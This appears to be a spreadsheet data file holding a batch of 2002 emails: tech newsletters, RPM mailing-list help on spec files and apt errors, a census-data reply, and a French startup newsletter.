 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJ7lFg7QgVtuoAABMMPZ9rR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_zabmTJRslCW5CH7esbKRiR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEB45sdc34QhaIHsSzky0PR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEk7TfUen4gVnxXFZcIuInR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=d7-wk3ZQLWkVTSzy79RmBekeVktk2eR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy2AvfGHPk1kOqFb2GVaGyR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=02-qia9Ilj8-YjD18-_XGuwrfzJ6nnR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=17-agitI5XrfbndSbnIz4s1RhjGRseR" style="color: #fff"&gt;Careers&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;table width=624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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e550&amp;ISSUE=2002-07-10" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=2c-DaaOnu0wRUKT1GOCNPvzp70JrRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message -----
 From: "James Rogers" &lt;jamesr@best.com&gt;
 &gt; As I've said before, American
 &gt; Indian Reservations are quite possibly the only place on the planet where
 &gt; you can find trailer park shantytowns where every household is bringing in
 a
 &gt; six-figure income.  I wish I could be exploited like that.
 If you can't trust the guvmint census, who can you trust?
 ===
 http://www.census.gov/Press-Release/www/2001/cb01fff15.html
 Income and Poverty
 $31,799
 Median household income for American Indians and Alaska Natives, based on a
 1998-2000 average. This is higher than for African Americans ($28,679), not
 statistically different from Hispanics ($31,703) and lower than for
 non-Hispanic Whites ($45,514), and Asians and Pacific Islanders ($52,553).
 &lt;http://www.census.gov/Press-Release/www/2001/cb01-158.html&gt;
 25.9%
 The poverty rate for American Indians and Alaska Natives, based on a
 1998-2000 average. This rate was not statistically different from the rates
 for African Americans and Hispanics, but was higher than those for
 non-Hispanic Whites, and Asians and Pacific Islanders.
 &lt;http://www.census.gov/Press-Release/www/2001/cb01-158.html&gt;
 701,000
 Number of American Indians and Alaska Natives below the poverty line, based
 on a 1998-2000 average.
 &lt;http://www.census.gov/Press-Release/www/2001/cb01-158.html&gt;
 ===
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ugly-ass, rare baby rhino born in Australian zoo )
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8294463,1717/
 Date: 2002-09-27T00:42:17+01:00
 (Some albino rhino)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Designer's Notebook: Stop Calling Games "Addictive"!
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613676,159/
 Date: 2002-10-06T18:12:44+01:00
 We in the game industry know what we mean when we say that a game is 
 "addictive." We think that quality in a game is a good thing: people like it, 
 they keep coming back to it, and they want to play it more and more. I agree 
 that it's a good thing. If a game has that quality, then it's probably a darn 
 good game. But using the word "addiction" to describe that quality does us no 
 favors with the general public.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Tech Specialist]  Bridge Concept
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/techspecialist/20020717.html"&gt;
       http://www.lockergnome.com/issues/techspecialist/20020717.html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&lt;/style&gt;&lt;title&gt;20020717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&lt;a href="http://www.qksrv.net/click-471546-5802823" target="_top" &gt;
 &lt;img src="http://www.qksrv.net/image-471546-5802823" width="468" height="60" alt="DVD PictureShow" border="0"&gt;&lt;/a&gt;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07.17.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Why rely on BIND when you can get UltraDNS:&lt;/b&gt; UltraDNS increases Web site
 performance, reliability, and security all for as low as $1.00 a month.
 &lt;a href="http://servedby.advertising.com/click/site=64021/mnum=63759"&gt;Click here to find out more&lt;/a&gt;.
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 Brooklyn Bridge for sale! No kidding! The town of Brooklyn, 
 Iowa has a bridge that they are &lt;a 
 href="http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&amp;item=174
 9445282"&gt;selling on Ebay&lt;/a&gt;, so if you have a need for such 
 a structure, or just want to have the right to say you 
 legitimately purchased the Brooklyn Bridge, here's your 
 opportunity! Seriously, this is not a prank!
 &lt;p&gt;Ever since I was down toward Des Moines last week and had 
 a cup-o-java with Jake at Starbucks, I've been craving 
 coffee. I can't see myself turning into a coffee junkie like 
 Chris, but it's just weird that this would happen, being 
 that my extent of coffee drinking has usually been limited 
 to the severe need for a quick morning wake-up or in an 
 effort to keep warm on cold mornings when out in the field 
 back in my Marine Corps days. 
 &lt;p&gt;As time has gone on, I've been trying to cut back on the 
 typical geek vices of sugar and caffeine, but I can't drink 
 coffee straight. It has to be sweet, and what's the point of 
 drinking coffee if there's no caffeine? Enter Splenda. An 
 artificial sweetener that has finally made it to Waterloo, 
 Iowa. Most of what Diana and I use sugar for has been 
 modified to use Splenda instead, with good results. 
 Hopefully this coffee thing is just a temporary kick like it 
 usually is. I have to brush my teeth after a cup or two from 
 the nasty breath. It's fun to test out the dragon-breath on 
 the cat to see just how bad it really is. If Bootes sniffs a 
 couple of times, it's not too bad, but if she instantly 
 recoils, time to employ the Sonicare for a couple of 
 minutes. See what you've started, Jake?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&lt;b&gt;Exchange Titanium Details Emerge&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://www.microsoft.com/presspass/features/2002/jul02/07-15exchangeqa.asp"&gt;http://www.microsoft.com/presspass/features/2002/jul02/07-15exchangeqa.asp&lt;/a&gt;
 &lt;p&gt;Oracle recently announced their intention to compete 
 directly with Microsoft Exchange, even accepting Outlook as 
 an email client. In what seems like a direct response, we're 
 handed details of the 2003 release of Exchange Titanium. 
 I've always liked what Exchange can do, so I'm certainly 
 looking forward to seeing what the new features will be all 
 about, but I'm also interested in what Oracle will be 
 bringing to the table. Better email functionality, control 
 and security are the name of the game, whoever ends up being 
 the vendor of choice. Included in this Q&amp;A is a screenshot 
 of what Outlook may look like once Office 11 is released. 
 It's an interesting concept shot, showing some new ways they 
 plan to handle email views. It doesn't say anything for 
 Exchange functionality, but it's worth noting regardless.
 &lt;!-- GnomeSYSTEM --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSYSTEM&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Better Pocket PC Audio&lt;/b&gt;
 &lt;br&gt;Unearthed by David Spencer
 &lt;p&gt;&lt;a class="url" href="http://home.adelphia.net/~mdukette/downloads.html"&gt;http://home.adelphia.net/~mdukette/downloads.html&lt;/a&gt;
 &lt;p&gt;An open source project is bringing a different spin to 
 audio and video on Pocket PCs, and my first impression is... 
 cool! I like what they're working on here. I decided to wipe 
 out my Jornada yesterday, so I haven't done a direct 
 comparison between the iPaq 3870 and Jornada 565 for audio 
 quality using this player, which has an equalizer built-in, 
 but it definitely has potential judging from how it sounds 
 on the iPaq right out of the gate. Definitely give this a 
 peek if you're one of those that likes to play audio and 
 video on a Pocket PC. Quite a few different versions are 
 supported, so you should be able to find something 
 appropriate to your device.
 &lt;!-- GnomeALERTZ --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeALERTZ&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Today's Top 5 kbAlertz&lt;/b&gt;
 &lt;p&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q320278"&gt;Q320278 - WD: "The Custom Dictionary &lt;Filename&gt; Is Not Available " Error When You Use Portuguese (Brazilian) Proofing Tools (Q320278)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q313147"&gt;Q313147 - GetNtmsObjectAttribute Does Not Return Correct Size When the Buffer Is Too Small (Q313147)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q313317"&gt;Q313317 - A GPO "Register PTR Records" Setting of "Disabled" Is Ignored (Q313317)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q310869"&gt;Q310869 - STOP Error When You Start Windows After You Connect a Scanner (Q310869)&lt;/a&gt;&lt;/li&gt;
 &lt;li&gt;&lt;a class="url" href="http://www.kbAlertz.com/redir.aspx?kbnumber=Q310772"&gt;Q310772 - PCMCIA Device May Not Work in Windows XP (Q310772)&lt;/a&gt;&lt;/li&gt;
 &lt;/ul&gt;&lt;/p&gt;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&lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;50 OS X TIPS: Whether you're making the "switch" from Windows, upgrading 
 from a previous version of Mac OS, or just want some helpful tricks to make 
 using OS X easier, this ebook is for you. Jake cover's everything from user 
 management, to some Terminal basics, to how to navigate differences between 
 OS 9 and OS X. 
 &lt;a href="http://store.eSellerate.net/s.asp?s=STR550611850&amp;Cmd=BUY&amp;SKURefnum=SKU6660735309&amp;AffIDC=AFF669529939"&gt;Get your copy today&lt;/a&gt;!    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;b&gt;Where's Java?&lt;/b&gt;
 &lt;p&gt;&lt;a class="url" href="http://news.com.com/2100-1001-944053.html"&gt;http://news.com.com/2100-1001-944053.html&lt;/a&gt;
 &lt;p&gt;Three readers asked me about this very thing this week, 
 and it's something you should probably know about if you use 
 Windows XP. Microsoft didn't bundle the Java Virtual Machine 
 with Windows XP, and since the release of XP, the JVM has been avaialble via the 
 Windows Update site as a "convenience" to users. Part of Sun's legal
 complaints surrounding how Microsoft has handled Java was that Microsoft did not have the right to 
 distribute their implementation via the web, though 
 they did have licensing rights to include it with Windows. 
 So essentially, Microsoft has things backwards, as it seems. 
 Well, to avoid further web distribution arguments, Microsoft 
 has yanked the JVM from the Windows Update site and all 
 other areas of Microsoft's web site. Microsoft is still 
 planning to include Java with Windows XP Service Pack 1. 
 You'll have to plan for Java support accordingly, as SP1 is 
 still a ways off and you can't get it from Microsoft at this 
 point. If you need it for a new installation of Windows XP 
 in the short term, Sun will gladly provide you with &lt;a href="http://java.sun.com/getjava/download.html"&gt;their 
 own distibution&lt;/a&gt;. 
 &lt;!-- GnomeSTUFF --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSTUFF&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Another Xeon Deal&lt;/b&gt;
 &lt;br&gt;Served up by Warren Dugas
 &lt;p&gt;&lt;a class="url" href="http://www.tigerdirect.com/applications/SearchTools/item-details.asp?sku=C170-1032%20P"&gt;http://www.tigerdirect.com/applications/SearchTools/item-details.asp?sku=C170-1032%20P&lt;/a&gt;
 &lt;p&gt;I mentioned a really nice deal on Compaq Evo W6000 dual-
 Xeon workstations a few weeks back, which I know several of 
 you took advantage of, but the $1999 price tag likely scared 
 off many others. If you still want to get into a Xeon, check 
 this one out. TigerDirect is offering an Evo W8000 
 workstation with a single 1.7GHz processor, 18.2GB 15,000rpm U160 
 drive, 48x CD-ROM and licenses for both Windows 2000 Pro and 
 NT 4.0 Workstation for $699.99. Note that there is NO memory 
 and no video card included, so you'll have to scrounge those for 
 yourself, but it really is a pretty good deal, on the whole. 
 Also realize that these systems take RAMBUS memory, which 
 will add a bit of cost, so be sure you know what you're 
 getting - a wicked-fast workstation, to be sure! Expandability is also quite amazing with these machines.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href="http://www.lockergnome.com/issues/techspecialist/20020717.html"&gt;http://www.lockergnome.com/issues/techspecialist/20020717.html&lt;/a&gt;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</si>
  <si>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problems with apt update
</t>
  </si>
  <si>
    <t xml:space="preserve">Hiya, I always seem to get errors when I do an "apt update", is this a 
 problem on the repository itself, or on my end, or possibly a timeout in 
 the connection due to my connection being a crappy modem?
 [root@spawn root]# apt-get update
 Hit http://apt.nixia.no redhat/7.2/i386/base/pkglist.gnomehide
 Hit http://apt.freshrpms.net redhat/7.2/i386/base/pkglist.os
 Ign http://apt.freshrpms.net redhat/7.2/i386 release.os
 Err http://apt.freshrpms.net redhat/7.2/i386/base/pkglist.updates
   Bad header line
 Hit http://apt.freshrpms.net redhat/7.2/i386 release.updates
 Err http://apt.freshrpms.net redhat/7.2/i386/base/pkglist.freshrpms
   400 Bad Request
 Err http://apt.freshrpms.net redhat/7.2/i386 release.freshrpms
   Bad header line
 Hit http://apt.freshrpms.net redhat/7.2/i386/base/srclist.freshrpms
 Ign http://apt.nixia.no redhat/7.2/i386 release.gnomehide
 Ign http://apt.nixia.no redhat/7.2/i386/base/mirrors
 Hit http://apt.freshrpms.net redhat/7.2/i386 release.freshrpms
 Ign http://apt.freshrpms.net redhat/7.2/i386/base/mirrors
 Ign http://apt.freshrpms.net redhat/7.2/i386/base/mirrors
 Ign http://apt.freshrpms.net redhat/7.2/i386/base/mirrors
 Ign http://apt.freshrpms.net redhat/7.2/i386/base/mirrors
 Failed to fetch 
 http://apt.freshrpms.net/redhat/7.2/i386/base/pkglist.updates
   Bad header line
 Failed to fetch 
 http://apt.freshrpms.net/redhat/7.2/i386/base/pkglist.freshrpms
   400 Bad Request
 Failed to fetch 
 http://apt.freshrpms.net/redhat/7.2/i386/base/release.freshrpms
   Bad header line
                                     -- \m/ --
   "...if I seem super human I have been misunderstood." (c) Dream Theater
          mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">NEWSLETTER COACHINVEST  SEPTEMBRE 2002
 CoachInvest, laccompagnateur des jeunes entreprises
 www.coachinvest.com ou 3615 COACHINVEST (0.34 Euros/min)
 DES NOUVELLES DE COACHINVEST.
 1- Lancement russi pour Coach'Invest Interactive qui dcroche ses premiers contrats.
 Coach'Invest Interactive accompagne les entreprises dans la cration, le dveloppement, l'optimisation et la gestion au quotidien de leur site Internet.
 Coach'Invest Interactive propose  ses clients de nombreux services afin de les aider  concevoir et  mettre en place leur stratgie Internet.
 Contact : Hugo BEAULIEU ; Tl : 01 56 77 01 20 / 06 81 57 85 47; E-mail : webmaster@coachinvest.com 
 Pour en savoir plus : http://www.coachinvest.com/entrepreneur/coach_interactive.html 
 2- Coach'Invest a investi dans deux nouvelles entreprises :
 Inqual :
 INQUAL est une socit cre en janvier 2001 par 3 ingnieurs issus de lENST et 1 cadre commercial expriment. Lquipe est aujourdhui compose de 12 personnes. Inqual est soutenu par lANVAR et a t rcompens pour ses contributions  linnovation par divers prix nationaux, dont le premier prix du concours Allgre.  Experte dans les architectures Internet, lquipe dInqual  matrise les conceptualisations de haut niveau (UML) et les serveurs dapplications, notamment ZOPE. INQUAL construit une offre au service des collectivits locales en proposant le premier  SIIC  (Systme dInformation Inter-Communal ). Ce systme apporte une gamme complte doutils permettant lutilisation professionnelle de fonctionnalits Internet, Intranet et Extranet, sans connaissances informatiques. La premire brique mtier de ce  SIIC  est un outil dautomatisation de publication pluri-mdia du Bulletin dInformations Municipales (BIM). Le logiciel LEBIM permet dditer et de modifier, 
  en ligne et en temps rel linformation pratique de la collectivit locale. Des outils intgrs permettent de gnrer automatiquement le site Internet dynamique de la commune. Le site ainsi dvelopp est mis  jour automatiquement et modifiable sans connaissances informatiques, par la commune elle-mme.                     Contact : Joseph OULHEN ; Tl : 02 98 02 03 61 ; E-mail : joseph.oulhen@inqual.com 
 Pour en savoir plus : http://www.coachinvest.com/startup/startup33.html
 Sir Assurances :
 Cre en 1994, la socit Sir Assurances est le premier courtier dassurances spcialis sur le march des entreprises nouvelles. Sir Assurances a dvelopp le portail www.newbizassur.com pour proposer aux entreprises nouvelles une large gamme de services et de produits dassurance rpondant  lensemble de leurs besoins. La socit commercialise sa plateforme technologique en marque blanche et/ou en co-branding auprs des principaux acteurs de lInternet en France et en Europe.
 Contact : Jean-Eudes LEBAUPIN ; Tl : 01 40 20 47 24 ; E-mail : jel@newbizassur.com   
 Pour en savoir plus :  http://www.coachinvest.com/startup/startup34.html
 3 - CoachInvest soutient activement deux vnements majeurs en faveur du dveloppement de lentrepreneuriat en France :
 Le lancement de lannuaire des investisseurs rgionaux
 Les journes Plug and Start (un vnement de la Technopole de lAube en Champagne).
  Annuaire des Investisseurs Rgionaux 2002 : 
 Pour rpondre aux besoins de financement des entreprises, lAnnuaire des Investisseurs Rgionaux recense les diffrents acteurs du financement et de laccompagnement des entreprises dans chaque rgion.
 Vous tes chef dentreprise ou dcid  exercer votre talent dentrepreneur, avec lAnnuaire des Investisseurs Rgionaux, vous identifierez rapidement les solutions de financement diversifies et adaptes aux besoins de votre entreprise. Cet annuaire est un outil de travail unique et indispensable pour lentrepreneur.
 Pour en savoir plus ou pour commander lAnnuaire des Investisseurs Rgionaux, contactez Virginie GOUPY par tlphone au 03 20 27 18 84 ou par mail : epr@vigiecom.net 
  Journes Plug and Start (8, 9 et 10 octobre 2002) : 
 La Technopole de lAube en Champagne (Troyes) innove avec le lancement les 8, 9 et 10 octobre prochains des Journes Plug and Start destines aux futurs crateurs dentreprises innovantes  caractre technologique ou scientifique. Avant mme son arrive  Troyes, chaque crateur bnficie dune premire analyse de son projet en toute confidentialit. Il a le droit  un tuteur (dirigeant dentreprise) pour laccompagner tout au long de son parcours. Un parrain est slectionn pour lui parmi les 150 experts constituants le cercle privilgi de la Technopole de lAube. Conseils personnaliss, alternance de travaux individuels et dateliers collectifs, expriences des intervenants, mise  disposition dun espace de travail quip, disponibilit de toute une quipe, mais aussi convivialit de la Technopole et plaisirs de la ville de Troyes  Plug and Start sest donn les moyens de russir et de faire russir les crateurs. A lissu des journes Plug and Start, les porteurs de pro
  jets pourront tre mis en contact avec le rseau de capital risque de la Technopole de lAube. Par ailleurs, ils pourront galement participer  un forum des capitaux o ils rencontreront de nombreux investisseurs.
 Pour en savoir plus et vous inscrire, contactez Michal NOBLOT au 03 25 83 10 10 ou par e-mail : m.noblot@technopole-aube.fr 
 DES NOUVELLES DE NOS PARTICIPATIONS.
 Caf &amp; Co : 
 Caf &amp; Co propose aux futurs gestionnaires indpendants de parcs de distributeurs automatiques de boissons l'ensemble des services tels que : solutions de financement, emplacements, formation et accompagnement, gestion, ... pour favoriser leur russite d'entrepreneur individuel. 
 Vous pouvez galement participer au dveloppement de Caf &amp; Co en bnficiant de l'installation gratuite d'un distributeur automatique de boissons chaudes dans vos locaux. 
 Contact : Nicolas BOUGON ; Tl : 06 60 41 35 14 ; E-mail : nbougon@noos.fr 
 Carlogo :
 La socit Carlogo propose aux annonceurs de nouvelles solutions d'affichage mobile  l'efficacit prouve (tude Ipsos) dont CARLOGO PUBLICITE qui permet aux automobilistes de gagner de l'argent (en louant un espace publicitaire sur leur voiture, les conducteurs sont rmunrs chaque mois).
 Aprs une campagne nationale pour le Crdit Foncier et des oprations pendant l't pour le Club Med, Galderma ou Aujourd'hui en France sur le Tour de France, de nouvelles campagnes auront lieu ds la rentre.
 Contact : Olivier MASCHINO ; Tl : 01 46 42 43 02 ; E-mail : olivier.maschino@carlogo.com 
 Pour en savoir plus : http://www.coachinvest.com/startup/startup20.html 
 France Actionnaire :
 Linformation sur les PME PMI cotes en bourse (entre 1 million et 1 milliard dEuros de capitalisation boursire) vous intresse ? Vous voulez connatre vos concurrents cots, leur valorisation, dcouvrir un secteur dactivit ?
 Sur www.france-actionnaire.com vous trouverez des analyses financires, des profils complets sur lactivit des socits et leurs concurrents, des ratios, des outils de comparaison.  Un outil rvolutionnaire dj utilis par un grand nombre dentreprises, danalystes financiers, de grants, et dinvestisseurs pour enfin avoir de linformation de qualit sur toutes les valeurs moyennes. 
 Nous vous proposons 2 offres et 2 modes daccs : 
 -	offre expert : paiement  la minute de consommation ou abonnement 
 -	offre premium : abonnement uniquement 
 Abonns  la newsletter de CoachInvest, profitez dune rduction de 30% sur les abonnements dune dure de 6 mois ou plus en donnant le mot de passe : CoachInvest.
 Contact : Sbastien FAIJEAN ; Tl : 01 48 01 87 27; E-mail :  contact@france-actionnaire.com   
 Pour en savoir plus : http://www.coachinvest.com/startup/startup08.html 
 Labelium :
 Labelium , 1er cabinet d'audit de sites Internet en France , vous propose de faire un devis gratuit d'intervention  pour votre site Internet. Le mtier de Labelium est de constater via un audit les forces et les faiblesses des sites et de recueillir via une grille dvaluation et selon 400 critres les lments damlioration possibles. Puis, nous catalysons lensemble des points damlioration identifis et rdigeons des recommandations stratgiques permettant au site daccrotre la qualit de  ses prestations.  A la suite de laudit et des recommandations , nous vous proposons des missions de soutien rcurrentes garantissant  votre site un niveau de performance optimal dans le temps. 
  Contact : Thierry HERRMANN ; Tl : 06 08 77 77 13; E-mail : info@labelium.com
 Pour en savoir plus : http://www.coachinvest.com/startup/startup28.html 
 Le Manoir du Grand Vignoble : 
 Le Manoir du Grand Vignoble, demeure du XVIIme sicle situ  40 kilomtres de Bergerac offre 10% de rduction sur les chambres (hors juillet-aot) aux lecteurs de la newsletter de CoachInvest. Les 44 chambres et suites sont spacieuses et souvrent sur les forts avoisinantes. Au restaurant ou sous les tonnelles de la terrasse, la cuisine propose est  limage de celle quvoque le mot Prigord, elle est gnreuse et gourmande, axe sur les produits du terroir sans ngliger pour cela linnovation.
 Contact : Denis PETE ; Tl : 05 53 24 23 18 ; E-mail : GRAND.VIGNOBLE@wanadoo.fr 
 Pour en savoir plus : http://www.coachinvest.com/startup/startup25.html   
 Netagis :
 NETAGIS vient de conclure un nouveau contrat en Gestion de Patrimoine avec les Mutuelles de Loire-Atlantique. La socit va grer les plans des diffrents btiments de la Mutuelle sur sa plateforme ActiGIS en version Patrimoine. Le contrat porte sur une dizaine de btiments reprsentant plusieurs milliers de mtre-carrs.
 Paralllement, NETAGIS annonce la sortie de ActiGIS Industrie en septembre destin  la gestion des plans de sites industriels pour apporter une relle assistance  la prise de dcision et  la matrise des risques industriels et environnementaux.
 Le programme de dveloppement R&amp;D de NETAGIS bnficie depuis le mois de juillet de l' appui de l'ANVAR.
 Contact : Patrick JULIEN ; Tl : 02 51 11 12 14  ; E-mail : patrick.julien@netagis.com  
 Pour en savoir plus : http://www.coachinvest.com/startup/startup21.html 
 QUE VOUS SOYEZ 
 -	ENTREPRENEUR (PORTEUR DE PROJET, DIRIGEANT DE START-UP, PATRON DE PME),
 -	PARTENAIRE POTENTIEL DE COACHINVEST (PRESTATAIRE LOCAL, ENTREPRISE NATIONALE, INSTITUTIONNEL, ASSOCIATION)
 NHESITEZ PAS A NOUS CONTACTER SI VOUS AVEZ ENVIE QUE LON TRAVAILLE ENSEMBLE.
 Si vous souhaitez en savoir plus sur CoachInvest, vous pouvez nous retrouver sur www.coachinvest.com 
 Retrouvez sur le minitel, code 3615 COACHINVEST (0.34 Euros/min), tous les documents juridiques dont vous avez besoin dans le cadre de votre entreprise. 
 Thomas Legrain
 PDG CoachInvest
 info@coachinvest.com
 ------------------------------------------------------------------------------
 Pour vous dsinscrire, rendez-vous  l'adresse suivante :
 http://www.coachinvest.com/Newsletter_commune/ml.php?type=desinscription&amp;addr=freebsd-questions@freebsd.org&amp;hash=d19867356ee809b9ece4a07f3d70ebd5
 To Unsubscribe: send mail to majordomo@FreeBSD.org
 with "unsubscribe freebsd-questions" in the body of the message
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Advise on RPM buidling
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Mark wrote :
 &gt; I'm just playing with gnuboy (game boy emulator) as its fairly simple
 &gt; and small.
 &gt; I'm having a few problems with the %docs macro.
 &gt; After reading thru maximum rpm and the rpm docs, I'm still stuck on one
 &gt; thing, in the source for gnuboy there is a directory called docs, that
 &gt; contains, well the docs.
 &gt; 
 &gt; I'm not sure what to pass to the %docs macro?
 &gt; I originally tried:
 &gt; %doc CHANGES  CONFIG  CREDITS  FAQ  HACKING  LIBERTY  README.old  
 &gt; 
 &gt; and it moans about missing files, would I have to put a few lines in the
 &gt; %build macro, just before configure to move the docs out of that
 &gt; directory and into the build root?
 &gt; 
 &gt; ie: mv docs/* ../
 Actually, I've already rebuild gnuboy, I just had forgotten to commit the
 spec file, which is now done :
 http://freshrpms.net/builds/gnuboy/gnuboy.spec
 Basically, %doc is used to put files in %docdir (default to
 /usr/share/docs/%{name}-%{version}/ and the listed files with relative
 paths (i.e. that don't start with a "/") are relative to the %{builddir}
 (the uncompressed source usually). So either you can choose to have a
 "docs" directory inside %{_docdir} by putting :
 %doc docs
 (or, totally equivalent, the latter just reminding it's a directory)
 %doc docs/
 Or you can put all files that are in docs/ directly in %{_docdir} :
 %doc docs/*
 Try both, poke around, and you should catch the difference if it's not
 already clear for you.
 You can also mark any file from the %{buildroot} as documentation (will be
 listed when using "-qd" to query the package's docs) by using %doc with
 absolute filenames, for example :
 %doc %{_datadir}/foo-game/manual
 (this is /usr/share/foo-game/manual, an absolute file)
 Also, for the packager's convenience, all files in /usr/share/man (aka
 %{_mandir}) are automatically tagged as %doc.
 &gt; Also one more thing, whats the best way to work out the dependencies?
 &gt; as for example with gnuboy, all hte docs and the website says is it
 &gt; needs SDL.
 &gt; 
 &gt; Do I set a Requires: SDL &gt;= 1.2 (as my system uses SDL-1.2.4-5) or just
 &gt; put Requires: SDL.
 Build the package once and see if it checks for a specific version, or read
 the installation notes. Often you'll see "checking for SDL &gt;= 1.2.0" for
 example when running configure, then it's best to also make the package
 depend on that version.
 &gt; One more quick question, I'm used to compiling source code no problem
 &gt; (cannot program, but stumble through), whats the best way for finding
 &gt; out what RPMS are needed for the Requires &amp; BuildRequires macros?
 &gt; apart from read all the docs and websites info.
 Well, read the docs indeed :-) You can also compile the package once
 without those fields and see what the configure script is checking for
 (basically, the libs and versions you'll need to add to the BuildRequires:)
 then once the package is built, query the automatic dependencies that rpm
 put into it. You'll see for instance if the binaries/libs from the package
 need SDL, gtk+  etc. Then add those "Requires:" and rebuild a final version
 of the package.
 Often you can omit some dependencies, for example if a program is checking
 for glib, gtk+, gdk-pixbuf and gnome libraries when being compiled,
 BuildRequires: gnome-libs-devel
 Requires: gnome-libs
 will be enough since they already depend on the "lower level" libs that are
 glib, gtk+ and gdk-pixbuf.
 &gt; Once again sorry to bother you with this, but I figured you were the
 &gt; best one to ask.
 Well, this is typically the type of information interesting to share with
 others, so I'll copy this answer to the rpm-list hoping some people will
 appreciate :-)
 &gt; p.s freshrpms rocks .. creep..creep!
 Thanks ;-)
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-5
 Load : 0.29 0.20 0.32, AC on-line, battery charging: 100% (8:29)
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Gianni Ponzi wrote:
 &gt; I have a prob when trying to install Linux (tried RedHat, Suse) on my
 &gt; laptop. I can start the install but after about 2min, the whole pc just
 &gt; dies.
 Can you disable DMA and see if this makes a difference?
 Nick
 -- 
 Irish Linux Users' Group: ilug@linux.ie
